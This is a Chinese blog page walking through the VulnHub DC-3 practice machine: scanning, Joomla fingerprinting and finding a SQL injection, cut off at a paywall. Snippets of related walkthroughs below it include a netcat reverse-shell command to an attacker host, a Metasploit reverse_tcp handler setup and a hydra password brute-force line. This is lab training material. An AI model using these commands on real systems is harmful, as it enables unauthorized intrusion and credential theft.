Vulnhub 靶机实战系列 DC-3靶机

原创 已于 2024-04-15 00:35:27 修改 · 1.3k 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #服务器 #运维 #web安全 #网络安全

于 2024-04-15 00:13:28 首次发布
本文详细描述了如何使用VulnHub靶机DC-3进行实战,包括主机发现、端口扫描、目录爆破、SQL注入漏洞利用,以及最终的提权过程。通过Nmap和Metasploit(MSF)工具,一步步展示了web渗透和反弹shell的方法。

VulnHub靶机 DC-3 打靶实战

目录

一、将靶机配置导入到虚拟机

靶机下载地址:

https://download.vulnhub.com/dc/DC-3-2.zip

image-20240414223653223

二、攻击方式

主机发现

使用arp-scan命令进行主机发现,或者使用nmap也可以

image-20240414224106334

image-20240414224310276

信息收集-端口扫描

nmap -p- 10.1.2.148

image-20240414224505166

只开放了80端口

服务探针

nmap -p80 -sV 10.1.2.148

image-20240414224607718

访问web服务,来到web界面

image-20240414224640257

目录爆破

发现网站管理后台等信息,结合浏览器插件发现使用joomla CMS,使用kali当中jooscn工具进行扫描,如果没有安装即可

image-20240414224824723

目录信息:

image-20240414224907901

扫描信息:

image-20240414224956642

进入后台,需要管理员用户和密码:

image-20240414225213135

搜索漏洞信息

根据前面信息收集到的内容,采用得CMS和版本信息,进行漏洞搜索,是否有可利用的漏洞

searchsploit Joomla 3.7.0

image-20240414225332868

存在SQL注入漏洞

web渗透 - SQL注入

根据漏洞信息,进行漏洞利用,查看一下文件内容,尝试利用,sqlmap爆数据库


                

                
                
        

    



  


        

            

                      
                        最低0.47元/天 解锁文章
                          
                      
            

        


    



                



	

		

			

				
					
DC-3靶机渗透测试

				
			

			

				

					Liumx0105的博客
				

				

					12-19
					
					1029
					
				

			

		

		

			
				
此文件给出了打穿靶机的关键,就是提到root权限就可以拿到flag,我们进行网站漏洞测试,发现了文件上传漏洞,在Templates/Templates/Beez3。最终我们将账户与密码爆出,但密码进行了哈希加密,我们使用kali自带解密工具john进行解密,我们先将加密密文放入txt文件中,在进行解密。这里他告诉了可以使用溢出提权(exp提权),并提供了提权工具,以及使用方法,使用wget进行工具下载。啥也没有,命令提权此方法行不通,突然想到可以用操作系统漏洞提权,先查看linux版本。

			
		

	



                

            
              



	

		

			

				
					
DC-3靶机渗透过程及学习

					
最新发布

				
			

			

				

					evenjoy_813的博客
				

				

					09-17
					
					1168
					
				

			

		

		

			
				
从对DC-3靶机整个的渗透过程来看,主要是web指纹识别到Joomla内容管理系统,识别其版本并查找存在的漏洞利用,获取服务器权限,然后通过linux内核漏洞进行提权的过程,先对DC-2有难度提升,也出过好多问题,下面就一起来看看全过程吧。

			
		

	



              


  
  
              

                


	

		

			

				
					
DC-3靶场实验报告

				
			

			

				

					jiaxingjia123的博客
				

				

					10-10
					
					1234
					
				

			

		

		

			
				
DC-3是另一个专门建立的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。由于我们前面采用nmap进行扫描时我们已经发现了中间件为joomla,我们可以采用joomscan进行扫描,如果我们不知道是joomla,我们可以采用目录扫描或者nikto等扫描工具进行扫描。我们前面已经知道了CMS是joomla,并且知道了后台地址,针对于这一个靶场这一步没有任何意义,这里只是提供一个思路,目录扫描,这里就不拓展了。

			
		

	





	

		

			

				
					
vulnhub靶机DC-3

				
			

			

				

					travelnight的博客
				

				

					03-10
					
					4956
					
				

			

		

		

			
				
原知识星球老文搬运

拿到靶机之后导入到virtualBOX里面。

1. nmap扫描主机存活,192.168.56.104 有个80端口,不放心的话可以用masscan。





2. 直接访问看下,这里提示只有一个flag,直接拿到root权限。





3. 习惯性的上一下dirbuster。发现访问到不存在的URL时候服务器也是返回200OK,这个扫描就没有什么参考价值了。



4.御剑扫描一下,发现后台页面。这个是joomlaCMS



5.参考了下知乎的这个joomla渗透,https

			
		

	



		

			
		



	

		

			

				
					
vulnhub-DC3

				
			

			

				

					weixin_55129870的博客
				

				

					05-15
					
					596
					
				

			

		

		

			
				
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。





开启kali.探测主机存活


nmap -sP 192.168.44.0/24



DC3IP: 192.168.44.143

扫描主机开放服务


nmap -A 192.168.44.143 -p 1-65535



只开放80端口,直接浏览器访问





指纹识别


whatweb http://192.168.44.143/



结果显示使用apache平台,...

			
		

	





	

		

			

				
					
Vulnhub靶机实战——DC-4

				
			

			

				

					冠霖L的博客
				

				

					09-27
					
					3362
					
				

			

		

		

			
				
靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip

描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样



环境:Vmware 15 Pro虚拟机软件

DC-4靶机IP地址:192.168.220.138

Kali的IP地址:...

			
		

	





	

		

			

				
					
vulnhub靶场实战DC-1

				
			

			

				

					huangyongkang666的博客
				

				

					04-18
					
					4981
					
				

			

		

		

			
				
vulnhub实战DC-1
1.DC-1介绍
DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。
它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。
要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。
有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。
总共有五个flag,但最终目标是在root的主目录中找到并读取

			
		

	





	

		

			

				
					
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程

				
			

			

				

					网络空间安全学习
				

				

					04-20
					
					2337
					
				

			

		

		

			
				
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。

			
		

	





	

		

			

				
					
vulnhub靶机渗透DC-5

				
			

			

				

					RestoreJustice的博客
				

				

					03-17
					
					308
					
				

			

		

		

			
				
前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。直接访问:http://192.168.80.134/%3C?反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty;这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-5,314/

			
		

	





	

		

			

				
					
vulnhubdc3

				
			

			

				

					qq_54030686的博客
				

				

					06-08
					
					377
					
				

			

		

		

			
				
各位师傅可直接移步至
查看此篇即可,本人只当做笔记,以理清逻辑关系
主机发现
nmap -sS 192.168.2.0/24
发现测试靶机的ip为192.168.2.107,进行端口扫描
发现仅80端口开放进行指纹识别
发现网站使用的框架为joomla,使用专属的joomlascan进行检测,
(中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128)
打开相应界面
使用joomlascan进行检测
并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷

			
		

	





	

		

			

				
					
vulnhub靶场之DC-3

				
			

			

				

					qq_58091216的博客
				

				

					01-08
					
					1923
					
				

			

		

		

			
				
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。

			
		

	





	

		

			

				
					
DC-3靶机打靶练习!!!!

				
			

			

				

					helloKittywz的博客
				

				

					08-11
					
					784
					
				

			

		

		

			
				
joomscan是一款开源的且针对joomla的扫描器,kali可以用命令apt install joomscan安装该工具kali自带的漏洞库:找文件的命令  find / -name *falg*john的密码暴力破解以及破解成功存放的位置/root/.john/john.pot文件巩固了交互shell :​​​​​​​。

			
		

	





	

		

			

				
					
DC-3靶机

				
			

			

				

					mlws1900的博客
				

				

					03-23
					
					980
					
				

			

		

		

			
				
下载不下来的可以用迅雷输入上面的网址进行下载。

			
		

	





	

		

			

				
					
DC3靶机

				
			

			

				

					PigLL的博客
				

				

					08-11
					
					591
					
				

			

		

		

			
				
## 关于DC3 靶机实验
1.信息收集:

2.网站信息
在浏览器中访问DC3的IP

利用工具kali中的nikto做一个简单的信息识别

通过扫描可以看到一些目录
然后通过浏览器可以访问

然后利用joomla专用的扫描工具joomscan扫描

发现了joomla的版本和一些目录
通过kali中的工具searchsploit扫描joomla 3.7.0版本存在的漏洞

通过扫描发现了一个42033.txt文件

通过searchsploit 将42033文件下载到当前目录

查看42033文件 发现

			
		

	





	

		

			

				
					
vulnhub靶机dc-1

				
			

			

				

					01-11
				

			

		

		

			
				
### VulnHub DC-1 靶机 攻略 介绍 下载

#### 关于DC-1靶机
VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。

#### 获取与安装
为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。

#### 初始配置建议
启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。

#### 基础信息搜集阶段
当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况:

```bash
nmap -A <target-ip>
```

上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。

#### 进阶探索与利用路径
随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限:

```ruby
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <local-ip> # Kali IP address
exploit
```

以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。

#### 密码破解辅助技巧
考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]:

```bash
hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip>
```

这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

  

	
    

      

      

      

        
        

          
          

            

              成就一亿技术人!
            

            

              拼手气红包6.0元
            

          

        

        

          

            还能输入1000个字符
          

          

             
          

          

            

              红包
              添加红包
            

            

              表情包
              插入表情
              

                

              

            

            

              表情包
              代码片
              

                
              

            

            

              
              
              
              
              
              
              
            

          

        

      

    

		

			

			

			
			

					 条评论被折叠 查看
			

			

				
			

		

	

	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值